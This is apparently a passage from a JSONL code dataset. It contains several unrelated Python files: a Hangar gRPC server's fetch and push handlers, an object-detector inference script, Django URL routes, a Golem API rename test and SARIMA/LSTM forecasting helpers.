hangar_service_pb2.ErrorProto(code=0, message='OK')\n\n reply = hangar_service_pb2.PushBranchRecordReply(error=err)\n return reply\n\n # -------------------------- Commit Record --------------------------------\n\n def FetchCommit(self, request, context):\n commit = request.commit\n commitRefKey = parsing.commit_ref_db_key_from_raw_key(commit)\n commitParentKey = parsing.commit_parent_db_key_from_raw_key(commit)\n commitSpecKey = parsing.commit_spec_db_key_from_raw_key(commit)\n\n reftxn = self.txnregister.begin_reader_txn(self.env.refenv)\n try:\n commitRefVal = reftxn.get(commitRefKey, default=False)\n commitParentVal = reftxn.get(commitParentKey, default=False)\n commitSpecVal = reftxn.get(commitSpecKey, default=False)\n finally:\n self.txnregister.abort_reader_txn(self.env.refenv)\n\n if commitRefVal is False:\n err = hangar_service_pb2.ErrorProto(code=1, message='COMMIT DOES NOT EXIST')\n reply = hangar_service_pb2.FetchCommitReply(commit=commit, error=err)\n yield reply\n raise StopIteration()\n else:\n raw_data_chunks = chunks.chunk_bytes(commitRefVal)\n bsize = len(commitRefVal)\n commit_proto = hangar_service_pb2.CommitRecord()\n commit_proto.parent = commitParentVal\n commit_proto.spec = commitSpecVal\n reply = hangar_service_pb2.FetchCommitReply(\n commit=commit,\n total_byte_size=bsize)\n for chunk in raw_data_chunks:\n commit_proto.ref = chunk\n reply.record.CopyFrom(commit_proto)\n yield reply\n\n def PushCommit(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n refBytes, offset = bytearray(request.total_byte_size), 0\n specVal = request.record.spec\n parentVal = request.record.parent\n size = len(request.record.ref)\n refBytes[offset: offset + size] = request.record.ref\n offset += size\n\n commitSpecKey = parsing.commit_spec_db_key_from_raw_key(commit)\n commitParentKey = parsing.commit_parent_db_key_from_raw_key(commit)\n commitRefKey = parsing.commit_ref_db_key_from_raw_key(commit)\n refTxn = self.txnregister.begin_writer_txn(self.env.refenv)\n try:\n cmtParExists = refTxn.put(commitParentKey, parentVal, overwrite=False)\n cmtRefExists = refTxn.put(commitRefKey, refBytes, overwrite=False)\n cmtSpcExists = refTxn.put(commitSpecKey, specVal, overwrite=False)\n finally:\n self.txnregister.commit_writer_txn(self.env.refenv)\n\n if cmtParExists is False:\n err = hangar_service_pb2.ErrorProto(code=1, message='COMMIT EXISTS')\n else:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.PushCommitReply(error=err)\n return reply\n\n # --------------------- Schema Record -------------------------------------\n\n def FetchSchema(self, request, context):\n schema_hash = request.rec.digest\n schemaKey = parsing.hash_schema_db_key_from_raw_key(schema_hash)\n hashTxn = self.txnregister.begin_reader_txn(self.env.hashenv)\n try:\n schemaExists = hashTxn.get(schemaKey, default=False)\n if schemaExists is not False:\n print(f'found schema: {schema_hash}')\n rec = hangar_service_pb2.SchemaRecord(digest=schema_hash, blob=schemaExists)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n else:\n print(f'not exists: {schema_hash}')\n rec = hangar_service_pb2.SchemaRecord(digest=schema_hash)\n err = hangar_service_pb2.ErrorProto(code=1, message='DOES NOT EXIST')\n finally:\n self.txnregister.abort_reader_txn(self.env.hashenv)\n\n reply = hangar_service_pb2.FetchSchemaReply(rec=rec, error=err)\n return reply\n\n def PushSchema(self, request, context):\n schema_hash = request.rec.digest\n schema_val = request.rec.blob\n\n schemaKey = parsing.hash_schema_db_key_from_raw_key(schema_hash)\n hashTxn = self.txnregister.begin_writer_txn(self.env.hashenv)\n try:\n newSchema = hashTxn.put(schemaKey, schema_val, overwrite=False)\n if newSchema is True:\n print(f'created new: {schema_val}')\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n else:\n print(f'exists: {schema_val}')\n err = hangar_service_pb2.ErrorProto(code=1, message='ALREADY EXISTS')\n finally:\n self.txnregister.commit_writer_txn(self.env.hashenv)\n\n reply = hangar_service_pb2.PushSchemaReply(error=err)\n return reply\n\n # ---------------------------- Data ---------------------------------------\n\n def FetchData(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n uncomp_nbytes = request.uncomp_nbytes\n comp_nbytes = request.comp_nbytes\n dBytes, offset = bytearray(comp_nbytes), 0\n size = len(request.raw_data)\n dBytes[offset: offset + size] = request.raw_data\n offset += size\n\n uncompBytes = blosc.decompress(dBytes)\n if uncomp_nbytes != len(uncompBytes):\n msg = f'ERROR: uncomp_nbytes sent: {uncomp_nbytes} != recieved {comp_nbytes}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.FetchDataReply(error=err)\n yield reply\n raise StopIteration()\n\n buff = io.BytesIO(uncompBytes)\n unpacker = msgpack.Unpacker(buff, use_list=False, raw=False, max_buffer_size=1_000_000_000)\n\n totalSize = 0\n buf = io.BytesIO()\n packer = msgpack.Packer(use_bin_type=True)\n hashTxn = self.txnregister.begin_reader_txn(self.env.hashenv)\n try:\n for digest in unpacker:\n hashKey = parsing.hash_data_db_key_from_raw_key(digest)\n hashVal = hashTxn.get(hashKey, default=False)\n if hashVal is False:\n msg = f'HASH DOES NOT EXIST: {hashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.FetchDataReply(error=err)\n yield reply\n raise StopIteration()\n else:\n schema_hash, fname = hashVal.decode().split(' ', 1)\n tensor = np.load(fname)\n\n p = packer.pack((\n digest,\n schema_hash,\n tensor.shape,\n tensor.dtype.num,\n tensor.tobytes()))\n totalSize += len(p)\n buf.write(p)\n\n if totalSize >= 100_000_000:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n cIter = chunks.tensorChunkedIterator(\n io_buffer=buf,\n uncomp_nbytes=totalSize,\n pb2_request=hangar_service_pb2.FetchDataReply,\n err=err)\n yield from cIter\n msg = 'HANGAR REQUESTED RETRY: developer enforced limit on returned '\\\n 'raw data size to prevent memory overload of user system.'\n context.set_details(msg)\n context.set_code(grpc.StatusCode.RESOURCE_EXHAUSTED)\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n yield hangar_service_pb2.FetchDataReply()\n raise StopIteration()\n\n finally:\n self.txnregister.abort_reader_txn(self.env.hashenv)\n\n if totalSize > 0:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n cIter = chunks.tensorChunkedIterator(\n io_buffer=buf,\n uncomp_nbytes=totalSize,\n pb2_request=hangar_service_pb2.FetchDataReply,\n err=err)\n\n yield from cIter\n\n def PushData(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n uncomp_nbytes = request.uncomp_nbytes\n comp_nbytes = request.comp_nbytes\n dBytes, offset = bytearray(comp_nbytes), 0\n size = len(request.raw_data)\n dBytes[offset: offset + size] = request.raw_data\n offset += size\n\n uncompBytes = blosc.decompress(dBytes)\n if uncomp_nbytes != len(uncompBytes):\n msg = f'ERROR: uncomp_nbytes sent: {uncomp_nbytes} != recieved {comp_nbytes}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n\n buff = io.BytesIO(uncompBytes)\n unpacker = msgpack.Unpacker(buff, use_list=False, raw=False, max_buffer_size=1_000_000_000)\n hashTxn = self.txnregister.begin_writer_txn(self.env.hashenv)\n try:\n for data in unpacker:\n digest, schema_hash, dShape, dTypeN, dBytes = data\n tensor = np.frombuffer(dBytes, dtype=np.typeDict[dTypeN]).reshape(dShape)\n recieved_hash = hashlib.blake2b(tensor.tobytes(), digest_size=20).hexdigest()\n if recieved_hash != digest:\n msg = f'HASH MANGLED, recieved: {recieved_hash} != digest: {digest}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n\n hashKey = parsing.hash_data_db_key_from_raw_key(digest)\n hashdir = os.path.join(self.data_dir, digest[:2])\n fname = os.path.join(hashdir, f'{digest}.npz')\n hashVal = f'{schema_hash} {fname}'.encode()\n if not os.path.isdir(hashdir):\n os.makedirs(hashdir)\n\n noPreviousHash = hashTxn.put(hashKey, hashVal, overwrite=False)\n if noPreviousHash:\n try:\n with open(fname, 'xb') as fh:\n np.save(fh, tensor)\n except FileExistsError:\n hashTxn.delete(hashKey)\n msg = f'DATA FILE EXISTS BUT HASH NOT RECORDED: {hashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n else:\n msg = f'HASH EXISTS: {hashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n finally:\n self.txnregister.commit_writer_txn(self.env.hashenv)\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.PushDataReply(error=err)\n return reply\n\n # ----------------------------- Label Data --------------------------------\n\n def FetchLabel(self, request, context):\n digest = request.rec.digest\n digest_type = request.rec.type\n rec = hangar_service_pb2.HashRecord(digest=digest, type=digest_type)\n reply = hangar_service_pb2.FetchLabelReply(rec=rec)\n\n labelKey = parsing.hash_meta_db_key_from_raw_key(digest)\n labelTxn = self.txnregister.begin_reader_txn(self.env.labelenv)\n try:\n labelVal = labelTxn.get(labelKey, default=False)\n if labelVal is False:\n msg = f'DOES NOT EXIST: labelval with key: {labelKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n else:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n compLabelVal = blosc.compress(labelVal)\n reply.blob = compLabelVal\n finally:\n self.txnregister.abort_reader_txn(self.env.labelenv)\n\n reply.error.CopyFrom(err)\n return reply\n\n def PushLabel(self, request, context):\n digest = request.rec.digest\n digest_type = request.rec.type\n\n uncompBlob = blosc.decompress(request.blob)\n recieved_hash = hashlib.blake2b(uncompBlob, digest_size=20).hexdigest()\n try:\n assert recieved_hash == digest\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n except AssertionError:\n msg = f'HASH MANGED: recieved_hash: {recieved_hash} != digest: {digest}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n reply = hangar_service_pb2.PushLabelReply(error=err)\n return reply\n\n labelHashKey = parsing.hash_meta_db_key_from_raw_key(digest)\n labelTxn = self.txnregister.begin_writer_txn(self.env.labelenv)\n try:\n succ = labelTxn.put(labelHashKey, uncompBlob, overwrite=False)\n if succ is False:\n msg = f'HASH ALREADY EXISTS: {labelHashKey}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n else:\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n finally:\n self.txnregister.commit_writer_txn(self.env.labelenv)\n\n reply = hangar_service_pb2.PushLabelReply(error=err)\n return reply\n\n # ------------------------ Fetch Find Missing -----------------------------------\n\n def FetchFindMissingCommits(self, request, context):\n c_branch_name = request.branch.name\n # c_head_commit = request.branch.commit\n c_ordered_commits = request.commits\n\n try:\n s_history = summarize.list_history(\n refenv=self.env.refenv,\n branchenv=self.env.branchenv,\n branch_name=c_branch_name)\n except ValueError:\n msg = f'BRANCH NOT EXIST. Name: {c_branch_name}'\n err = hangar_service_pb2.ErrorProto(code=1, message=msg)\n\n s_orderset = set(s_history['order'])\n c_orderset = set(c_ordered_commits)\n c_missing = list(s_orderset.difference(c_orderset)) # only difference to PushFindMissingCommits\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n if len(c_missing) == 0:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=s_history['head'])\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n else:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=s_history['head'])\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n reply.commits.extend(c_missing)\n\n return reply\n\n def PushFindMissingCommits(self, request, context):\n c_branch_name = request.branch.name\n c_head_commit = request.branch.commit\n c_ordered_commits = request.commits\n\n s_commits = commiting.list_all_commits(self.env.refenv)\n s_orderset = set(s_commits)\n c_orderset = set(c_ordered_commits)\n s_missing = list(c_orderset.difference(s_orderset)) # only difference to FetchFindMissingCommits\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n if len(s_missing) == 0:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=c_head_commit)\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n else:\n brch = hangar_service_pb2.BranchRecord(name=c_branch_name, commit=c_head_commit)\n reply = hangar_service_pb2.FindMissingCommitsReply(branch=brch, error=err)\n reply.commits.extend(s_missing)\n\n return reply\n\n def FetchFindMissingHashRecords(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=False))\n\n LMDB_CONFIG = config.get('hangar.lmdb')\n with tempfile.TemporaryDirectory() as tempD:\n tmpDF = os.path.join(tempD, 'test.lmdb')\n tmpDB = lmdb.open(path=tmpDF, **LMDB_CONFIG)\n commiting.unpack_commit_ref(self.env.refenv, tmpDB, commit)\n s_hashes = set(queries.RecordQuery(tmpDB).data_hashes())\n tmpDB.close()\n\n c_missing = list(s_hashes.difference(c_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingHashRecordsReply\n cIter = chunks.missingHashIterator(commit, c_missing, err, response_pb)\n yield from cIter\n\n def PushFindMissingHashRecords(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=False))\n\n s_hashset = set(hashs.HashQuery(self.env.hashenv).list_all_hash_keys_raw())\n\n s_missing = list(c_hashset.difference(s_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingHashRecordsReply\n cIter = chunks.missingHashIterator(commit, s_missing, err, response_pb)\n yield from cIter\n\n def FetchFindMissingLabels(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=False))\n\n LMDB_CONFIG = config.get('hangar.lmdb')\n with tempfile.TemporaryDirectory() as tempD:\n tmpDF = os.path.join(tempD, 'test.lmdb')\n tmpDB = lmdb.open(path=tmpDF, **LMDB_CONFIG)\n commiting.unpack_commit_ref(self.env.refenv, tmpDB, commit)\n s_hashes = set(queries.RecordQuery(tmpDB).metadata_hashes())\n tmpDB.close()\n\n c_missing = list(s_hashes.difference(c_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingLabelsReply\n cIter = chunks.missingHashIterator(commit, c_missing, err, response_pb)\n yield from cIter\n\n def PushFindMissingLabels(self, request_iterator, context):\n for idx, request in enumerate(request_iterator):\n if idx == 0:\n commit = request.commit\n hBytes, offset = bytearray(request.total_byte_size), 0\n size = len(request.hashs)\n hBytes[offset: offset + size] = request.hashs\n offset += size\n uncompBytes = blosc.decompress(hBytes)\n c_hashset = set(msgpack.unpackb(uncompBytes, raw=False, use_list=True))\n s_hash_keys = list(hashs.HashQuery(self.env.labelenv).list_all_hash_keys_db())\n s_hashes = map(parsing.hash_meta_raw_key_from_db_key, s_hash_keys)\n s_hashset = set(s_hashes)\n\n s_missing = list(c_hashset.difference(s_hashset))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n response_pb = hangar_service_pb2.FindMissingLabelsReply\n cIter = chunks.missingHashIterator(commit, s_missing, err, response_pb)\n yield from cIter\n\n def FetchFindMissingSchemas(self, request, context):\n commit = request.commit\n c_schemas = set(request.schema_digests)\n\n LMDB_CONFIG = config.get('hangar.lmdb')\n with tempfile.TemporaryDirectory() as tempD:\n tmpDF = os.path.join(tempD, 'test.lmdb')\n tmpDB = lmdb.open(path=tmpDF, **LMDB_CONFIG)\n commiting.unpack_commit_ref(self.env.refenv, tmpDB, commit)\n s_schemas = set(queries.RecordQuery(tmpDB).schema_hashes())\n tmpDB.close()\n\n c_missing = list(s_schemas.difference(c_schemas))\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.FindMissingSchemasReply(commit=commit, error=err)\n reply.schema_digests.extend(c_missing)\n return reply\n\n def PushFindMissingSchemas(self, request, context):\n commit = request.commit\n c_schemas = set(request.schema_digests)\n\n s_schemas = set(hashs.HashQuery(self.env.hashenv).list_all_schema_keys_raw())\n s_missing = list(c_schemas.difference(s_schemas))\n\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.FindMissingSchemasReply(commit=commit, error=err)\n reply.schema_digests.extend(s_missing)\n return reply\n\n\ndef serve(hangar_path, overwrite=False):\n '''Start serving the GRPC server. Should only be called once.\n\n Raises:\n e: critical error from one of the workers.\n '''\n\n # ---------------- Start the thread pool for the grpc server --------------\n\n grpc_thread_pool = futures.ThreadPoolExecutor(\n max_workers=50,\n thread_name_prefix='grpc_thread_pool')\n server = grpc.server(\n thread_pool=grpc_thread_pool,\n maximum_concurrent_rpcs=10,\n options=[('grpc.default_compression_algorithm', False),\n ('grpc.optimization_target', 'throughput')])\n\n # ------------------- Start the GRPC server -------------------------------\n\n hangserv = HangarServer(hangar_path, overwrite)\n hangar_service_pb2_grpc.add_HangarServiceServicer_to_server(hangserv, server)\n server.add_insecure_port('[::]:50051')\n server.start()\n\n print('started')\n try:\n while True:\n time.sleep(0.1)\n except (KeyboardInterrupt, SystemExit):\n print('stopped')\n server.stop(0)\n\n\nif __name__ == '__main__':\n workdir = os.getcwd()\n print(workdir)\n serve(workdir)\n","sub_path":"src/hangar/remote/hangar_server.py","file_name":"hangar_server.py","file_ext":"py","file_size_in_byte":25650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"195008656","text":"# coding: utf-8\n# @Author: oliver\n# @Date: 2019-07-14 18:50:35\n\nimport os\nimport sys\nimport cv2\nimport time\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\n\ncurr = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(curr)\n\nfrom models.pose_dla import get_model\nfrom models.resnet import get_model\nfrom utils.image import transform_preds\nfrom utils.image import get_affine_transform\nfrom utils.decode import ctdet_decode\n\nDEBUG = True\n\ndef load_model(model, model_path, device):\n checkpoint = torch.load(model_path, map_location=device)\n state_dict_ = checkpoint['state_dict']\n\n state_dict = {}\n for k in state_dict_:\n if k.startswith('module') and not k.startswith('module_list'):\n state_dict[k[7:]] = state_dict_[k]\n else:\n state_dict[k] = state_dict_[k]\n\n model_state_dict = model.state_dict()\n # check loaded parameters\n for k in state_dict:\n if k in model_state_dict:\n if state_dict[k].shape != model_state_dict[k].shape:\n print('Skip loading parameter {}, required shape{}, '\\\n 'loaded shape{}.'.format(\n k, model_state_dict[k].shape, state_dict[k].shape))\n state_dict[k] = model_state_dict[k]\n else:\n print('Drop parameter {}.'.format(k))\n for k in model_state_dict:\n if not (k in state_dict):\n print('No param {}.'.format(k))\n state_dict[k] = model_state_dict[k]\n model.load_state_dict(state_dict, strict=False)\n return model\n\nclass Detector(object):\n def __init__(self, model_path, image_size=(384, 384), device='cuda'):\n self._image_size = image_size\n self._device = device\n\n self._num_classes = 4\n self._max_per_image = 50\n self._threshold = 0.5\n self._mean = np.array([0.485, 0.456, 0.406], dtype=np.float32).reshape(1, 1, 3)\n self._std = np.array([0.229, 0.224, 0.225], dtype=np.float32).reshape(1, 1, 3)\n\n heads = {'wh': 2, 'reg': 2, 'hm': self._num_classes}\n head_conv = 64\n self._model = get_model(18, heads, head_conv)\n for param in self._model.parameters():\n param.requires_grad = False\n self._model = load_model(self._model, model_path, self._device)\n self._model = self._model.to(self._device)\n self._model.eval()\n\n def pre_process(self, image):\n height, width = image.shape[0:2]\n c = np.array([width / 2., height / 2.], dtype=np.float32)\n s = max(height, width) * 1.0\n\n trans_input = get_affine_transform(c, s, 0, [self._image_size[1], self._image_size[0]])\n img = cv2.warpAffine(image, trans_input, (self._image_size[1], self._image_size[0]), flags=cv2.INTER_LINEAR)\n img = ((img / 255. - self._mean) / self._std).astype(np.float32)\n '''\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = np.expand_dims(img, axis=-1)\n '''\n img = img.transpose(2, 0, 1)\n img = np.expand_dims(img, axis=0)\n img = torch.from_numpy(img)\n meta = {'c': c, 's': s}\n return img, meta\n\n def post_process(self, dets, meta, output_size):\n dets = dets.data.cpu().numpy()\n dets = dets.reshape(-1, dets.shape[2])\n c = meta['c']\n s = meta['s']\n h, w = output_size\n\n top_preds = {}\n dets[:, :2] = transform_preds(dets[:, 0:2], c, s, (w, h))\n dets[:, 2:4] = transform_preds(dets[:, 2:4], c, s, (w, h))\n classes = dets[:, -1]\n scores = dets[:, 4]\n '''\n if len(scores) > self._max_per_image:\n kth = len(scores) - self._max_per_image\n thresh = np.partition(scores, kth)[kth]\n '''\n\n for j in range(self._num_classes):\n inds = np.logical_and(classes == j, scores >= self._threshold)\n top_preds[j + 1] = np.concatenate([dets[inds, :4].astype(np.float32), \n scores[inds].reshape(-1, 1).astype(np.float32)], axis=1)\n return top_preds\n\n def detect(self, image):\n t1 = time.time()\n img, meta = self.pre_process(image)\n t2 = time.time()\n img = img.to(self._device)\n if self._device == 'cuda':\n torch.cuda.synchronize()\n t3 = time.time()\n with torch.set_grad_enabled(False):\n output = self._model(img)[-1]\n hm = output['hm'].sigmoid_()\n wh = output['wh']\n reg = output['reg']\n if self._device == 'cuda':\n torch.cuda.synchronize()\n t4 = time.time()\n dets = ctdet_decode(hm, wh, reg=reg, K=self._max_per_image)\n dets = self.post_process(dets, meta, hm.size()[2:4])\n if self._device == 'cuda':\n torch.cuda.synchronize()\n t5 = time.time()\n \n if DEBUG:\n '''\n for j in range(1, self._num_classes+1):\n for bbox in dets[j]:\n cv2.rectangle(image, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 3)\n '''\n bbox = dets[0]\n area_ratio = (bbox[1] - bbox[0]) * (bbox[3] - bbox[2]) / float(image.shape[0] * image.shape[1])\n if 0.1 < area_ratio < 1.0:\n cv2.rectangle(image, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (0, 255, 0), 3)\n print('\\npre: {:.3f}s | net: {:.3f}s | post: {:.3f}s'.format(t2-t1, t4-t3, t5-t4))\n return image \n\nif __name__ == '__main__':\n model_path = './checkpoints/model_250.pth'\n detector = Detector(model_path, image_size=(384, 384), device='cpu')\n\n images_dir = './experiments/test_images'\n output_dir = './experiments/outputs'\n file_list = os.listdir(images_dir)\n total_time = 0.0\n for file in tqdm(file_list):\n file_name = os.path.join(images_dir, file)\n image = cv2.imread(file_name)\n t1 = time.time()\n show = detector.detect(image)\n t2 = time.time()\n total_time += (t2 - t1)\n cv2.imwrite(os.path.join(output_dir, file), show)\n print('avg time: {}s, {}s/{}'.format(total_time/len(file_list), total_time, len(file_list)))\n\n\n","sub_path":"detector/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"342000073","text":"from django.conf.urls import url\n\nfrom . import views,api\n\nurlpatterns = [\n # ex: /\n url(r'^$', views.info, name='info'),\n # ex: /info\n url(r'^info/$', views.info, name='info'),\n # ex: /status\n url(r'^status/$', views.status, name='status'),\n # ex: /status/node/2\n url(r'^status/node/(?P.*)/$', views.node, name='node'),\n # ex: /api\n url(r'^api/regions/totData/$', api.renderRegionsTotData),\n url(r'^api/regions/$', api.renderRegions),\n url(r'^api/regions/(?P.*)/$', api.renderRegionsDataForNodeId),\n url(r'^api/services/$', api.renderServices),\n url(r'^api/services/(?P.*)/$', api.renderServicesForRegion),\n url(r'^api/historical/(?P.*)/$', api.renderHistoricalForRegion),\n url(r'^api/hosts/(?P.*)/$', api.renderHostsListForRegion),\n url(r'^api/institutions/$', api.institutions, name='institutions'),\n url(r'^api/institutions/(?P.*)/$', api.institutions),\n]","sub_path":"infographics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326277540","text":"from golem import actions\n\nfrom projects.golem_api.pages import project\nfrom projects.golem_api.pages import test_\n\n\ndef setup(data):\n project.using_project('general')\n data.test_one = project.create_random_test(data.project)\n data.test_two = '{}.{}'.format(actions.random_str(), actions.random_str())\n project.create_test(data.project, data.test_two)\n\n\ndef test(data):\n # rename test in root\n response = test_.rename_test(data.project, data.test_one, data.test_one)\n assert response.json()['errors'] == ['A file with that name already exists']\n # rename test in folder\n response = test_.rename_test(data.project, data.test_two, data.test_two)\n assert response.json()['errors'] == ['A file with that name already exists']\n","sub_path":"projects/golem_api/tests/test/rename_test_dest_exists.py","file_name":"rename_test_dest_exists.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444472151","text":"from functools import reduce\r\nfrom statsmodels.tsa.api import ExponentialSmoothing, SimpleExpSmoothing, Holt, SARIMAX\r\nimport pandas as pd\r\nimport datetime\r\nfrom matplotlib import pyplot as plt\r\nimport requests\r\nimport io\r\nfrom sklearn.metrics import mean_squared_error as rms\r\nimport numpy as np\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nimport math\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import LSTM\r\n\r\ndef sarima(data,steps):\r\n model=SARIMAX(endog=data.values,order=(2,0,1),seasonal_order=(0,1,1,7),enforce_invertibility=False)\r\n sarima_fit= model.fit()\r\n print(sarima_fit.summary())\r\n\r\n # Rollling Forecast\r\n \r\n # Number of days to Forecast Parameter\r\n end =int(0.2*len(data))\r\n values = data[:-end]\r\n actual_values = data[len(data)-end:]\r\n pred_values=[]\r\n indexes=data[len(data)-end:].index\r\n\r\n for i in range(end):\r\n model = ARIMA((values),(2, 0, 1))\r\n arima_fit= model.fit()\r\n \r\n fnext = arima_fit.forecast()[0][0] \r\n pred_values.append(fnext)\r\n values = data[:-end+i]\r\n\r\n pred_values=pd.Series(pred_values)\r\n pred_values.index=indexes\r\n\r\n #Doubt\r\n #pred_values=pred_values.shift(-1)[:]\r\n\r\n rmse=rms(actual_values,pred_values)\r\n # Needs correction ??\r\n print(\"RMSE VALUE\",rmse)\r\n #print(actual_values,pred_values)\r\n print(len(pred_values))\r\n return { \"model\":\"Baseline\",\"index\":list(indexes), \"actual\":list(actual_values.values), \"predicted\":list(pred_values),\"rmse\":rmse}\r\n\r\ndef transform_supervised(dat,lag=1):\r\n x=dat.shift(lag)\r\n y=dat\r\n return x,y \r\n\r\ndef scale_data(df):\r\n mx=MinMaxScaler()\r\n df[\"x\"]=mx.fit_transform(np.asarray(df[\"x\"]).reshape(-1,1))\r\n return mx,df \r\n\r\ndef inverse_scale_data(mx,df):\r\n df[\"x\"]=mx.inverse_transform(np.asarray(df[\"x\"]).reshape(-1,1))\r\n return mx,df \r\n\r\ndef fit_lstm(df, batch_size, nb_epoch, neurons):\r\n x, y = df.iloc[:,:-1], df.iloc[:, -1]\r\n x = np.asarray(x).reshape(x.shape[0], 1, x.shape[1])\r\n model = Sequential()\r\n model.add(LSTM(neurons, batch_input_shape=(batch_size, x.shape[1], x.shape[2]), stateful=True))\r\n model.add(Dense(1))\r\n model.compile(loss='mean_squared_error', optimizer='adam')\r\n for i in range(nb_epoch):\r\n model.fit(x, y, epochs=1, batch_size=batch_size, verbose=0, shuffle=False)\r\n model.reset_states()\r\n return x,model\r\n\r\ndef lstm(data,steps):\r\n print(data,steps)\r\n indexes=data.index\r\n end =int(0.2*len(data))\r\n train, test = data[0:-end], data[-end:]\r\n\r\n x,y=transform_supervised(train)\r\n\r\n df = pd.concat([x,y],axis=1)\r\n df.columns=[\"x\",\"y\"]\r\n df.fillna(0,inplace=True)\r\n mx,df=scale_data(df)\r\n\r\n x,lstm_model = fit_lstm(df, 1, 5, 40)\r\n # forecast the entire training dataset to build up state for forecasting\r\n #train_reshaped = train_scaled[:, 0].reshape(len(train_scaled), 1, 1)\r\n testx,testy=transform_supervised(test)\r\n\r\n df1 = pd.concat([testx,testy],axis=1)\r\n df1.columns=[\"x\",\"y\"]\r\n df1.fillna(0,inplace=True)\r\n mx1,df1=scale_data(df1)\r\n testx, testy = df1.iloc[:,:-1], df1.iloc[:, -1]\r\n testx = np.asarray(testx).reshape(testx.shape[0], 1, testx.shape[1])\r\n\r\n pred_values = lstm_model.predict(testx, batch_size=1)\r\n \r\n rmse=rms(testy,pred_values)\r\n \r\n print(\"RMSE VALUE : \",rmse)\r\n return { \"model\":\"LSTM\",\"index\":list(indexes[-end:]), \"actual\":list(testy), \"predicted\":reduce(lambda x,y: x+y,pred_values.tolist()),\"rmse\":rmse}","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511037758","text":"import numpy as np\nimport pygame\nimport time\n\n\n## <-------GRID 